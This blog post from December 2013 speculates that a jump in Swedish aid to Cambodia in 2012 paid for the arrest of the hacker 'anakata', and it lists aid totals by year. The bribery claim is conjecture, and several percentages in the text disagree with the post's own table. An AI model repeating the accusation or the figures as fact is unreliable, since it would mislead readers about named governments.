Was the extra $10 million actually spent or only added to the published statistics to make it look like a more natural development than the way it looks when the aid increases with 32.15% in 2012 only to drop again by 30.22% in 2013? Has Sweden purchased another hacker for extraction?

Either way: it is very hard to escape the tinfoil-hat speculation that this is a pure cover-up.

Swedish little piggy went to the market

December 12th, 2013 by qnrq

In 2012, after anakata’s arrest in Cambodia, suspicions rose that Sweden might have paid for his arrest through an increase in its annual aid package. The reason being that only four days later ambassadors signed a deal granting an all-time-high donation.

Anders Jörle, Swedish Ministry for Foreign Affairs spokesperson, was quoted in Swedish press calling the speculations about the oddly timed increase “ridiculously far-fetched”, but publicly released numbers show that perhaps money trail speculations were not that far from the truth.

What the published statistics show is that one of the highest donations occurred in 1997, at the time when Hun Sen rose to power through a military coup. 1997 was the year when the currently serving government rose to power through violence, not long after Pol Pot’s Khmer Rouge regime had fallen and Cambodia fell back to civil war standards. In relation to the rough times that Cambodia was facing in 1997 it is quite expected that Sweden would donate an all time high sum.

Yet the 1997 donation is historically only the second-largest sum donated to Cambodia by the Swedish government in the form of aid. The largest donation occurred in 2012, coincidentally the same year as anakata was arrested in central Phnom Penh.

Not only was 2012 the largest total, it was also the largest modern percentage increase, 32.15% between 2011 and 2012, while the increase between 2010 and 2011 was only 6.25%. Coincidentally, the total aid sum mysteriously dropped again between 2012 and 2013 by a good 30.22%.

In 2013 the same ministry, the Swedish Ministry for Foreign Affairs, released a report in which they concluded that they didn’t really have any clue how Sweden is handling the aid money which is paid annually to countries considered in need of help.

The Swedish Ministry for Foreign Affairs report concluded that parts of the Swedish annual aid is handled by trainees and nobody is actually following up where the money is going.

In fact, everybody is so well informed about how aid packages are received by third world countries in need that when Swedish SIDA in 2013 donated IT equipment to the Cambodian Ministry of Education, Nath Bunroeun, Education Ministry Secretary of State, begged local officials not to bring it home for private use.

So, who took the ~$9,400,000 paid by Sweden to extract anakata home?

Aid by year

1980 $12,300,000
1981 $8,730,000
1982 $8,340,000
1983 $5,460,000
1984 $8,460,000
1985 $3,110,000
1986 $4,449,000
1987 $1,080,000
1988 $0
1989 $5,270,000
1990 $3,580,000
1991 $3,170,000
1992 $19,200,000
1993 $10,100,000
1994 $5,670,000
1995 $3,970,000
1996 $14,300,000
1997 $30,400,000
1998 $14,200,000
1999 $7,550,000
2000 $16,800,000
2001 $16,900,000
2002 $14,500,000
2003 $18,700,000
2004 $22,500,000
2005 $14,400,000
2006 $17,200,000
2007 $17,900,000
2008 $16,100,000
2009 $23,900,000
2010 $24,000,000
2011 $28,300,000
2012 $35,800,000
2013 $26,400,000